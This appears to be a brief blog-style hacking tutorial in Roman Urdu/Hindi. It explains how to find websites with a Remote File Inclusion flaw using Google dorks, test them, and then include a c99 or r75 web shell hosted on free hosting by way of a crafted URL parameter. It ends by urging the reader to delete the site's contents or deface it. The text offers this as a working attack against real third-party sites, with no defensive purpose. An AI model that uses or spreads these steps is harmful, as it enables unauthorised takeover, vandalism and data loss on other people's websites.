RFI Vulnerable sites ko serch krne k lie gogle me Rfi dorks likho.Phr jo sites ayegi wo kuch is trah hogi
Www.site.com/index.php?action=
Us site ki vul search karne k liye=sign k aagy Www.google.com likhen.
Phir url kuch aisi banegi:
www.abc.com/index.php?action=www.google.com
Is url se agr google ka main page khulta ha to ye site Rfi vul ha
Phir ye krna hai k kisi webhosting like t35.com ya 110mb.com pe c99 ya r75 shell upload kren.
Ab ye karen k site mein jaha aapne Google ka link dia tha, Waha ab apne shell ka link den.
Is se site is tarah hojaegi: Www.abc.com/index.php?action=www.yourt35site.com/c99shell.php?
Shell ka link php tak hai, Us k baad aapne ? lagana hai warna is k baghair shell execute nahi hoga
Phir aapki control hogi us site pe. Jo bhi krna hai karen. Contents del marden ya apna deface page upload kren.
------Finish----
Post a Comment